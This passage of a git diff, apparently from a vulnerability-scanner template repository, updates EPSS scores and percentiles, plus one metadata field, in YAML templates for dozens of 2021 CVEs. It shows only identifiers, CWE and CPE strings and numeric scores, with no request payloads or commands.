0.01173 + epss-percentile: 0.83438 cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 21aa2a3f99..97707b30df 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-41467 cwe-id: CWE-79 epss-score: 0.00133 - epss-percentile: 0.48156 + epss-percentile: 0.48289 cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index b8231993e6..7b1016d967 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41569 cwe-id: CWE-829 - epss-score: 0.00978 - epss-percentile: 0.81649 + epss-score: 0.0083 + epss-percentile: 0.80096 cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index bdfdb05a13..d6ebfeabff 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-41648 cwe-id: CWE-89 epss-score: 0.06237 - epss-percentile: 0.92823 + epss-percentile: 0.92878 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index 81a06bcf17..26de6d75b5 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-41649 cwe-id: CWE-89 - epss-score: 0.03203 - epss-percentile: 0.90143 + epss-score: 0.03607 + epss-percentile: 0.90729 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index 30b547e174..24bad439d4 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-41653 cwe-id: CWE-94 epss-score: 0.95374 - epss-percentile: 0.99188 + epss-percentile: 0.99205 cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index 979b798ee2..8bcc66cb81 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-41749 cwe-id: CWE-94 - epss-score: 0.51209 - epss-percentile: 0.97243 + epss-score: 0.52531 + epss-percentile: 0.97293 cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index 0076708788..8b024b1912 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -22,8 +22,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41773 cwe-id: CWE-22 - epss-score: 0.97424 - epss-percentile: 0.99925 + epss-score: 0.97386 + epss-percentile: 0.99902 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index fe87253116..d347cf2ca5 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-41826 cwe-id: CWE-601 epss-score: 0.93913 - epss-percentile: 0.98934 + epss-percentile: 0.98962 cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 0d58028c8b..140e18deb9 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-41878 cwe-id: CWE-79 epss-score: 0.00955 - epss-percentile: 0.81427 + epss-percentile: 0.81497 cpe: cpe:2.3:a:hkurl:i-panel_administration_system:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 19daa047a5..c546eef410 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-4191 cwe-id: CWE-287 - epss-score: 0.26453 - epss-percentile: 0.96278 + epss-score: 0.24657 + epss-percentile: 0.96207 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index c51ee703cc..ee29930d24 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-41951 cwe-id: CWE-79 epss-score: 0.77372 - epss-percentile: 0.97919 + epss-percentile: 0.9794 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 0531444d70..39c9d6c57d 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: "CVE-2021-42013" cwe-id: CWE-22 - epss-score: 0.9734 - epss-percentile: 0.99868 + epss-score: 0.97287 + epss-percentile: 0.99841 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index f25f10a618..dfbac9f38c 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-42063 cwe-id: CWE-79 - epss-score: 0.00491 - epss-percentile: 0.73418 + epss-score: 0.00418 + epss-percentile: 0.71432 cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml index 6cf128dbde..1d7b33c78e 100644 --- a/http/cves/2021/CVE-2021-42071.yaml +++ b/http/cves/2021/CVE-2021-42071.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42071 cwe-id: CWE-78 - epss-score: 0.95761 + epss-score: 0.95674 epss-percentile: 0.99279 cpe: cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index cfcf37e12d..8882f778b4 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-42192 cwe-id: CWE-863 - epss-score: 0.02809 - epss-percentile: 0.89534 + epss-score: 0.03284 + epss-percentile: 0.90317 cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 956cf576c6..f9ae626259 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42237 cwe-id: CWE-502 - epss-score: 0.9748 - epss-percentile: 0.99965 + epss-score: 0.97498 + epss-percentile: 0.99977 cpe: cpe:2.3:a:sitecore:experience_platform:7.5:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml index 6edbcf46ec..bdfb931b39 100644 --- a/http/cves/2021/CVE-2021-42258.yaml +++ b/http/cves/2021/CVE-2021-42258.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42258 cwe-id: CWE-89 - epss-score: 0.97301 - epss-percentile: 0.99848 + epss-score: 0.96873 + epss-percentile: 0.9964 cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index aa45f2a735..7bf713c2ba 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-42551 cwe-id: CWE-79 epss-score: 0.00124 - epss-percentile: 0.4652 + epss-percentile: 0.46641 cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index d810f28903..9d4bb5bf68 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-42565 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41104 + epss-percentile: 0.4118 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 43133d89c8..1c81532c8c 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-42566 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41104 + epss-percentile: 0.4118 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index 29b8ca8071..a639703ae5 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-42567 cwe-id: CWE-79 epss-score: 0.25981 - epss-percentile: 0.96253 + epss-percentile: 0.96283 cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 8e825358f1..8e7799393e 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42627 - epss-score: 0.05731 - epss-percentile: 0.92544 + epss-score: 0.06041 + epss-percentile: 0.92756 cpe: cpe:2.3:o:dlink:dir-615_firmware:20.06:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index 60f1eb57ea..5c8a822e55 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-42663 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45068 + epss-percentile: 0.45174 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml index cff9254374..f80d9fd80f 100644 --- a/http/cves/2021/CVE-2021-42667.yaml +++ b/http/cves/2021/CVE-2021-42667.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42667 cwe-id: CWE-89 - epss-score: 0.04917 - epss-percentile: 0.91941 + epss-score: 0.04318 + epss-percentile: 0.91464 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index c12bc5a9a6..b6f86c49c4 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42887 cwe-id: CWE-287 - epss-score: 0.05698 - epss-percentile: 0.9253 + epss-score: 0.06252 + epss-percentile: 0.92885 cpe: cpe:2.3:o:totolink:ex1200t_firmware:4.1.2cu.5215:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 71f3cebd66..22ade82f22 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-43062 cwe-id: CWE-79 - epss-score: 0.00617 - epss-percentile: 0.76383 + epss-score: 0.00585 + epss-percentile: 0.75786 cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index bc6d844390..cc718aca04 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43287 cwe-id: CWE-200 - epss-score: 0.61405 - epss-percentile: 0.97498 + epss-score: 0.59013 + epss-percentile: 0.97444 cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index 896cc67ee6..d3038bd6ab 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-43421 cwe-id: CWE-434 - epss-score: 0.07622 - epss-percentile: 0.93458 + epss-score: 0.06629 + epss-percentile: 0.93112 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml index 86fd801224..4d6caf7ae4 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43495 cwe-id: CWE-22 epss-score: 0.03503 - epss-percentile: 0.90533 + epss-percentile: 0.90603 cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 30766fe199..db7a2a75be 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43496 cwe-id: CWE-22 epss-score: 0.03503 - epss-percentile: 0.90533 + epss-percentile: 0.90603 cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index cc05909a0a..3b9e929cd6 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-43510 cwe-id: CWE-89 - epss-score: 0.03727 - epss-percentile: 0.90812 + epss-score: 0.03948 + epss-percentile: 0.91118 cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 7e698a9305..10dfb0725f 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-43574 cwe-id: CWE-79 epss-score: 0.0019 - epss-percentile: 0.56439 + epss-percentile: 0.5661 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index f793f12162..5c33dcab9c 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-43725 cwe-id: CWE-79 - epss-score: 0.0013 - epss-percentile: 0.4759 + epss-score: 0.00163 + epss-percentile: 0.52832 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index fed685d6c4..774e1a459d 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-43734 cwe-id: CWE-22 epss-score: 0.01098 - epss-percentile: 0.82735 + epss-percentile: 0.82825 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index 65af477984..7cc85b6623 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43778 cwe-id: CWE-22 - epss-score: 0.77372 - epss-percentile: 0.97919 + epss-score: 0.68846 + epss-percentile: 0.97701 cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index 720152f189..ed247d2cc5 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43798 cwe-id: CWE-22 - epss-score: 0.97219 - epss-percentile: 0.99793 + epss-score: 0.97105 + epss-percentile: 0.99736 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index f0bb254ed9..9e4f757139 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-43810 cwe-id: CWE-79 epss-score: 0.00513 - epss-percentile: 0.7397 + epss-percentile: 0.74103 cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index d91af0d730..5fdbf0b1d4 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-44077 cwe-id: CWE-306 epss-score: 0.97254 - epss-percentile: 0.99812 + epss-percentile: 0.99817 cpe: cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index bc5e751b3e..6e2ede326d 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-44138 cwe-id: CWE-22 - epss-score: 0.01648 - epss-percentile: 0.86163 + epss-score: 0.01291 + epss-percentile: 0.84342 cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 3bdbb94200..049d729de6 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-44139 cwe-id: CWE-918 epss-score: 0.01355 - epss-percentile: 0.84641 + epss-percentile: 0.84732 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 62b0b76d2f..acc8365a89 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44152 cwe-id: CWE-306 - epss-score: 0.83454 - epss-percentile: 0.9814 + epss-score: 0.86597 + epss-percentile: 0.98335 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index 322dd39d68..3d3f32feb8 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44427 cwe-id: CWE-89 - epss-score: 0.03236 - epss-percentile: 0.90193 + epss-score: 0.02195 + epss-percentile: 0.88264 cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index a34a540292..7b74792f7b 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-44451 cwe-id: CWE-522 - epss-score: 0.00614 - epss-percentile: 0.76319 + epss-score: 0.00518 + epss-percentile: 0.74232 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index e45d67afda..37b486283e 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44515 cwe-id: CWE-287 - epss-score: 0.97287 - epss-percentile: 0.99839 + epss-score: 0.97233 + epss-percentile: 0.99807 cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index d56435f7ff..9c8ebadc1c 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-44528 cwe-id: CWE-601 epss-score: 0.00087 - epss-percentile: 0.36073 + epss-percentile: 0.36061 cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 13f65a8825..8c2d769710 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44529 cwe-id: CWE-94 - epss-score: 0.95739 - epss-percentile: 0.99272 + epss-score: 0.95206 + epss-percentile: 0.99171 cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index 32c8df3d64..9ebea4b2c7 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-44848 cwe-id: CWE-203 epss-score: 0.01603 - epss-percentile: 0.85991 + epss-percentile: 0.86023 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44910.yaml b/http/cves/2021/CVE-2021-44910.yaml index abb65c2e0f..b2aad729a8 100644 --- a/http/cves/2021/CVE-2021-44910.yaml +++ b/http/cves/2021/CVE-2021-44910.yaml @@ -8,6 +8,8 @@ info: SpringBlade is a comprehensive project upgraded and optimized from a commercial-grade project, featuring both a SpringCloud distributed microservice architecture and a SpringBoot monolithic microservice architecture. The SpringBlade framework has a default SIGN_KEY, which can be exploited by attackers to obtain sensitive information such as user account password logs. reference: - https://github.com/chillzhuang/blade-tool + metadata: + max-request: 3 tags: cve,cve2023,springblade,blade,info-leak http: diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index ab1ee0cadc..76e3370928 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-45043 cwe-id: CWE-22 epss-score: 0.05404 - epss-percentile: 0.92343 + epss-percentile: 0.92389 cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index 9b9512b48e..f5d35f66f7 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45092 cwe-id: CWE-74 - epss-score: 0.0797 - epss-percentile: 0.93594 + epss-score: 0.0618 + epss-percentile: 0.92847 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index 74f3aa4f23..4fc37f5684 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45232 cwe-id: CWE-306 - epss-score: 0.9723 - epss-percentile: 0.998 + epss-score: 0.97202 + epss-percentile: 0.99785 cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 8f8b469078..9c05e587ca 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-45380 cwe-id: CWE-79 epss-score: 0.00314 - epss-percentile: 0.66882 + epss-percentile: 0.67062 cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45382.yaml b/http/cves/2021/CVE-2021-45382.yaml index 0d7e7cd17e..8a908754fc 100644 --- a/http/cves/2021/CVE-2021-45382.yaml +++ b/http/cves/2021/CVE-2021-45382.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-45382 cwe-id: CWE-78 epss-score: 0.96871 - epss-percentile: 0.99629 + epss-percentile: 0.99639 cpe: cpe:2.3:o:dlink:dir-820l_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 56df76c3c0..948ba036f1 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-45422 cwe-id: CWE-79 epss-score: 0.00218 - epss-percentile: 0.59581 + epss-percentile: 0.59748 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 7047ec383f..fb4c6a0b7f 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -20,7 +20,7 